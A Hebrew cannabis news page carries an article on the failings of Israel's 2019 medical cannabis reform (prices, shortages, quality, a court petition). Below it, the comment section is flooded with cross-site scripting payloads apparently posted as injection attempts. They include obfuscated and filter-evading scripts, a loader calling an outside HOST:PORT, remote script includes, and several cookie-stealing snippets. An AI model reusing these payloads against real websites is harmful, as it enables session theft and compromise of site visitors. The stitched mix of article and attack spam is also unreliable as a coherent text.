מגזין חדשות קנאביס

image

הרפורמה שכשלה: מחסור חמור בקנאביס רפואי בארץ

בעקבות מהפכת הקנאביס הרפואי, נוצר חוסר במלאי באספקת הקנאביס ברחבי הארץ. בתי המרקחת ריקים כמעט לחלוטין מקנאביס והמטופלים הזקוקים לקנאביס הרפואי מיואשים מהמצב.

רפורמת הקנאביס הרפואי הייתה אמורה להיות בשורה חיובית ומשמחת עבור המטופלים הזקוקים לקנאביס. הרפורמה, שנכנסה לתוקפה במאי 2019, נועדה להסדיר את מעמדו של הקנאביס הרפואי כתרופה ולהקל על החולים ברכישה ובצריכה. היא הגדירה בין היתר שרכישת קנאביס רפואי תהיה בבתי מרקחת ולא דרך עמדות חלוקה ספורות כמו בית חולים אברבנאל, נקודת החלוקה ״תיקון עולם״ שבתל אביב או ישירות מהמגדלים.

עוד קבעה הרפורמה שרופאים שעברו הכשרה מתאימה יוכלו להנפיק רשיון עבור מגדלי קנאביס רפואי, ומגדלי קנאביס יקבלו את הרשיון כל עוד הם עומדים בתקן משרד הבריאות. בנוסף, נאסר על המגדלים להיות בקשר ישיר עם המטופל, ונקבע כי שקית של 10 גרם תעלה 180 שקלים.

כביכול מדובר בצעדים חיוביים שיאפשרו לחולי סרטן, טרשת נפוצה, בעיות מפרקים, אנשים הסובלים מאפליפסיה, מפוסט טראומה ומכאבים כרוניים לרכוש באופן מסודר את הקנאביס הרפואי. אלא שבפועל, הרפורמה הסבה יותר נזק מתועלת.

מחירים יקרים יותר מאז שיצאה הרפורמה לדרך, נוצר זינוק עצום במחירי הקנאביס הרפואי. אם בעבר המטופלים שלמו מחיר קבוע וחודשי – 470 שקלים לחודש כולל דמי משלוח, הרי שהיום המחיר הינו לפי גרם – 180 שקלים לשקית של 10 גרם. המשמעות היא ש-64 אחוז מהמטופלים בארץ הצורכים יותר מ-30 גרם נאלצים לשלם הרבה יותר עבור צריכת הקנאביס הרפואי. עבור החולים שזקוקים לקאנביס כדי להתמודד עם כאבים פיזיים ו/או נפשיים יומיומיים, מדובר בהוצאה כספית כבדה המקשה עוד יותר על חייהם.

מחסור בקנאביס מטופלים רבים מתלוננים על כך שישנו מחסור בקנאביס רפואי בבתי המרקחת מאז שהרפורמה הושקה. הרפורמה מגדירה מספר זנים מצומצם של קנאביס אותם ניתן לרכוש, ובמידה ומטופל זקוק לזן אחר אין בנמצא. במקרים רבים אחרים מדפי בית המרקחת ריקים כמעט לחלוטין מקנאביס רפואי בשל מחסור בתפרחות קנאביס. בתי המרקחת טוענים כי הסיבה למחסור בתפרחות הקנאביס היא שיצרני מוצרי הקנאביס לא מצליחים לעמוד בביקוש הרב.

רוצים לדעת איך לגדל קנאביס בבית בשיטה הידרופונית? לחצו כאן בלית ברירה המטופלים נאלצים לנסוע מרחקים ארוכים כדי לרכוש קנאביס, או לחלופין הם פונים לשוק השחור ורוכשים קנאביס רפואי באופן פיראטי כשלא ברור מה טיב האיכות של המוצר.

איכות ירודה טענה נוספת שנשמעת מפי המטופלים היא שמאז השקת הרפורמה האיכות של הקנאביס נפגמה. הועלו טענות על ריח של עובש משקיות הקנאביס, ונוצר בקרב המטופלים חשש כי החומר רוסס בחומרי הדברה. על שקיות הקנאביס הרפואי הנמכרות בבתי מרקחת לא מצוין האם החומר אורגני או מודבר, ומשרד הבריאות לא הגדיר תקנות בנושא בטענה כי זוהי אחריותו של משרד החקלאות.

מטופלי הקנאביס הרפואי לא מוכנים לקבל את הרפורמה. בסוף חודש מארס 2019 הם הגישו עתירה לבג״ץ נגד יישומה. בתגובה, שופטי בג״ץ הוציאו באוקטובר 2019 צו ביניים המורה למשרד הבריאות להאריך את האסדרה הישנה של הקנאביס הרפואי כפי שהייתה לפני הרפורמה עד לתאריך ה-31 במרץ 2020.

בנוסף, בצו עלתה דרישה ממשרד הבריאות לקבל עדכון חודשי לגבי הדיונים העוסקים בפיקוח על מחירי הקנאביס הרפואי ועל התקדמות הסבת רשיונות המטופלים.

למרות זאת, המצב נותר כשהיה – המחירים יקרים וישנו מחסור חמור בקנאביס הרפואי. החולים מרגישים שהם חיים בתוך סיוט מתמשך ומקווים שהמצב ישתנה במהרה. בשבילם הקנאביס הוא לא סם ״ממסטל״ או ״סם לבילויים וצחוקים עם החבר׳ה״. מדובר בתרופה לכל דבר, כזו שעוזרת להם להעביר את הימים קצת יותר בקלות ולהתמודד עם הסבל והכאב.

    2359 תגובות:

  1. image innerHTML=location.hash>#<script>alert(1)</script>

    DSAD

  2. DSAD

  3. DSAD

  4. DSAD

  5. image <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

    DSAD

  6. DSAD

  7. image */alert(1)">'onload="/*<svg/1='

    DSAD

  8. DSAD

  9. image <form action=javascript:alert(1)><input type=submit>

    DSAD

  10. image <math><brute href=javascript:alert(1)>click

    DSAD

  11. DSAD

  12. image innerHTML=location.hash>#<script>alert(1)</script>

    DSAD

  13. DSAD

  14. DSAD

  15. DSAD

  16. image <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

    DSAD

  17. DSAD

  18. image */alert(1)">'onload="/*<svg/1='

    DSAD

  19. DSAD

  20. DSAD

  21. image <math><brute href=javascript:alert(1)>click

    DSAD

  22. image <form action=javascript:alert(1)><input type=submit>

    DSAD

  23. image <isindex action=javascript:alert(1) type=submit value=click>

    DSAD

  24. image <form><button formaction=javascript:alert(1)>click

    DSAD

  25. image <form><input formaction=javascript:alert(1) type=submit value=click>

    DSAD

  26. image <form><input formaction=javascript:alert(1) type=image value=click>

    DSAD

  27. image <form><input formaction=javascript:alert(1) type=image src=SOURCE>

    DSAD

  28. image <isindex formaction=javascript:alert(1) type=submit value=click>

    DSAD

  29. image <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

    DSAD

  30. image <svg><script xlink:href=data:,alert(1) />

    DSAD

  31. image <math><brute xlink:href=javascript:alert(1)>click

    DSAD

  32. image <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

    DSAD

  33. image "><img src=1 onerror=alert(1)>.gif

    DSAD

  34. image <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

    DSAD

  35. image GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

    DSAD

  36. image "><script src=data:,alert(1)//

    DSAD

  37. image <script src="//brutelogic.com.br/1.js#

    DSAD

  38. image "><script src=//brutelogic.com.br/1.js#

    DSAD

  39. image <link rel=import href="data:text/html,<script>alert(1)</script>

    DSAD

  40. image "><link rel=import href=data:text/html,<script>alert(1)</script>

    DSAD

  41. image <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

    DSAD

  42. image <body onhashchange=alert(1)><a href=#x>click this!#x

    DSAD

  43. image <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

    DSAD

  44. image <body onscroll=alert(1)><br><br><br><br>

    DSAD

  45. image <video onloadstart=alert(1)><source>

    DSAD

  46. image <form onsubmit=alert(1)><input type=submit>

    DSAD

  47. image <select onchange=alert(1)><option>1<option>2

    DSAD

  48. DSAD

  49. image <scr<script>ipt>alert('XSS')</scr<script>ipt>

    DSAD

  50. image "><script>alert('XSS')</script>

    DSAD

  51. image "><script>alert(String.fromCharCode(88,83,83))</script>

    DSAD

  52. image <img src=x onerror=alert(String.fromCharCode(88,83,83));>

    DSAD

  53. image <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

    DSAD

  54. image "><img src=x onerror=alert('XSS');>

    DSAD

  55. image "><img src=x onerror=alert(String.fromCharCode(88,83,83));>

    DSAD

  56. image "><svg/onload=alert(String.fromCharCode(88,83,83))>

    DSAD

  57. image <video><source onerror="javascript:alert(1)">

    DSAD

  58. image <video src=_ onloadstart="alert(1)">

    DSAD

  59. image <details/open/ontoggle="alert`1`">

    DSAD

  60. image <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

    DSAD

  61. image <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

    DSAD

  62. image data:text/html,<script>alert(0)</script>

    DSAD

  63. image jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )// //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

    DSAD

  64. image ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http: //i.imgur.com/P8mL8.jpg">

    DSAD

  65. image " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

    DSAD

  66. image ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

    DSAD

  67. image javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

    DSAD

  68. image javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a

    DSAD

  69. image javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*

    DSAD

  70. image javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/

    DSAD

  71. image javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*

    DSAD

  72. image javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//

    DSAD

  73. image javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*

    DSAD

  74. image --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*

    DSAD

  75. image /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*

    DSAD

  76. image javascript://--></title></style></textarea></script><svg "//' onclick=alert()//

    DSAD

  77. image /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

    DSAD

  78. image <script>window['alert'](document['domain'])<script>

    DSAD

  79. image <script>window['alert'](0)</script>

    DSAD

  80. image <script>parent['alert'](1)</script>

    DSAD

  81. DSAD

  82. DSAD

  83. DSAD

  84. DSAD

  85. DSAD

  86. image <svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>

    DSAD

  87. DSAD

  88. image */alert(1)">'onload="/*<svg/1='

    DSAD

  89. DSAD

  90. DSAD

  91. image <math><brute href=javascript:alert(1)>click

    DSAD

  92. image <form action=javascript:alert(1)><input type=submit>

    DSAD

  93. image <isindex action=javascript:alert(1) type=submit value=click>

    DSAD

  94. image <form><input formaction=javascript:alert(1) type=submit value=click>

    DSAD

  95. image <form><button formaction=javascript:alert(1)>click

    DSAD

  96. image <form><input formaction=javascript:alert(1) type=image value=click>

    DSAD

  97. image <form><input formaction=javascript:alert(1) type=image src=SOURCE>

    DSAD

  98. image <isindex formaction=javascript:alert(1) type=submit value=click>

    DSAD

  99. image <iframe srcdoc=<svg/o&#x6Eload=alert(1)>>

    DSAD

  100. image <svg><script xlink:href=data:,alert(1) />

    DSAD

  101. image <math><brute xlink:href=javascript:alert(1)>click

    DSAD

  102. image <svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>

    DSAD

  103. image "><img src=1 onerror=alert(1)>.gif

    DSAD

  104. image <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

    DSAD

  105. image GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

    DSAD

  106. image "><script src=data:,alert(1)//

    DSAD

  107. image <script src="//brutelogic.com.br/1.js#

    DSAD

  108. image "><script src=//brutelogic.com.br/1.js#

    DSAD

  109. image <link rel=import href="data:text/html,<script>alert(1)</script>

    DSAD

  110. image "><link rel=import href=data:text/html,<script>alert(1)</script>

    DSAD

  111. image <script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)

    DSAD

  112. image <body onhashchange=alert(1)><a href=#x>click this!#x

    DSAD

  113. image <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x

    DSAD

  114. image <body onscroll=alert(1)><br><br><br><br>

    DSAD

  115. image <video onloadstart=alert(1)><source>

    DSAD

  116. image <form onsubmit=alert(1)><input type=submit>

    DSAD

  117. image <select onchange=alert(1)><option>1<option>2

    DSAD

  118. DSAD

  119. image <script>\u0061\u006C\u0065\u0072\u0074(1)</script>

    DSAD

  120. image <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

    DSAD

  121. image <img src="1" onerror="alert(1)" />

    DSAD

  122. image <iframe src="javascript:alert(1)"></iframe>

    DSAD

  123. image <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

    DSAD

  124. DSAD

  125. image <script ~~~>confirm(1)</script ~~~>

    DSAD

  126. DSAD

  127. image <</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>

    DSAD

  128. image <</script/script><script ~~~>\u0061lert(1)</script ~~~>

    DSAD

  129. image <img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>

    DSAD

  130. image </style></scRipt><scRipt>alert(1)</scRipt>

    DSAD

  131. image <img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>

    DSAD

  132. image <svg><x><script>alert('1'&#41</x>

    DSAD

  133. image <iframe src=""/srcdoc='<svg onload=alert(1)>'>

    DSAD

  134. image '"--></style></script><script>shadowlabs(0x000045)</script>

    DSAD

  135. image <<scr\0ipt/src=http://xss.com/xss.js></script

    DSAD

  136. image '"--></style></script><script>RWAR(0x00010E)</script>

    DSAD

  137. image "><iframe src="http://google.com"% 3E

    DSAD

  138. image '<script>window.onload=function(){document.forms[0].message.value='1';}</script>

    DSAD

  139. image x”</title><img src=x onerror=alert(1)>

    DSAD

  140. image <script> document.getElementById("safe123").setCapture(); document.getElementById("safe123").click(); </script>

    DSAD

  141. image <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>

    DSAD

  142. image <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>

    DSAD

  143. image <script>(function() {var event = document.createEvent("MouseEvents");event.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>

    DSAD

  144. image <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  145. image <script>xhr=new ActiveXObject("Msxml2.XMLHTTP");xhr.open("GET","/xssme2",true);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){alert(xhr.responseText.match(/'([^']+)/)[1])}};xhr.send();</script>

    DSAD

  146. image <script>alert(document.documentElement.innerHTML.match(/'([^']+)/)[1])</script>

    DSAD

  147. image <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']+)/)[1])</script>

    DSAD

  148. image <iframe id="ifra" src="/"></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write("<scr" + "ipt>top.foo = Object.defineProperty</scr" + "ipt>"); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>

    DSAD

  149. image <script> var xdr = new ActiveXObject("Microsoft.XMLHTTP"); xdr.open("get", "/xssme2?a=1", true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*?)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>

    DSAD

  150. image <script>alert(document.head.innerHTML.substr(146,20));</script>

    DSAD

  151. image <script>alert(document.head.childNodes[3].text)</script>

    DSAD

  152. image <script> d = document.createElement("div"); d.appendChild(document.head.cloneNode(true)); alert(d.innerHTML.match("cookie = '(.*?)'")[1]); </script>

    DSAD

  153. image <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>

    DSAD

  154. image <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>

    DSAD

  155. image <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")};document.body.appendChild(x);</script>

    DSAD

  156. image <script>x=document.createElement("iframe");x.src="http://xssme.html5sec.org/404";x.onload=function(){window.frames[0].document.write("<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>")};document.body.appendChild(x);</script>

    DSAD

  157. image <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>

    DSAD

  158. image <script> document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click({'type':'click','isTrusted':true}); </script>

    DSAD

  159. image <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' + x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>

    DSAD

  160. image <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById("safe123").click=function()+{alert(Safe.get());} document.getElementById("safe123").click(test); </script>

    DSAD

  161. image <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%3Dnew%20this.contentWindow.window.XMLHttpRequest%28%29%3Bfff.open%28%22GET%22%2C%22xssme2%22%29%3Bfff.onreadystatechange%3Dfunction%28%29%7Bif%20%28fff.readyState%3D%3D4%20%26%26%20fff.status%3D%3D200%29%7Balert%28fff.responseText%29%3B%7D%7D%3Bfff.send%28%29%3B></iframe>

    DSAD

  162. image <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #

    DSAD

  163. image <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>

    DSAD

  164. image <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #

    DSAD

  165. image <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";getElementById("safe123").click=function()+{alert(Safe.get());};getElementById("safe123").click(test);</SCRIPT>#

    DSAD

  166. image <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie\s+=\s+'(.*)'/gi); alert(RegExp.$1); } } xmlHttp.send(null); }; </script>#

    DSAD

  167. image <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type="click";document.getElementById("safe123").click=function()+{alert(Safe.get());};document.getElementById("safe123").click(test);'><source>#

    DSAD

  168. image <script for=document event=onreadystatechange>getElementById('safe123').click()</script>

    DSAD

  169. image <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>

    DSAD

  170. image <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>

    DSAD

  171. image <iframe src="404" onload="frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  172. image <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#

    DSAD

  173. image <iframe src="404" onload="self.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  174. image <iframe src="404" onload="content.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  175. image <iframe src="404" onload="top.frames[0].document.write("<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>")"></iframe>

    DSAD

  176. image <iframe onload="write('<script>'+location.hash.substr(1)+'</script>')"></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();

    DSAD

  177. image <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>

    DSAD

  178. image <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href="javascript:\"<script>var%20xhr%20%3D%20new%20XMLHttpRequest()%3Bxhr.open('GET'%2C%20'http%3A%2F%2Fhtml5sec.org%2Fxssme2'%2C%20true)%3Bxhr.onload%20%3D%20function()%20%7B%20alert(xhr.responseText.match(%2Fcookie%20%3D%20'(.*%3F)'%2F)%5B1%5D)%20%7D%3Bxhr.send()%3B<\/script>\"") autofocus></textarea>

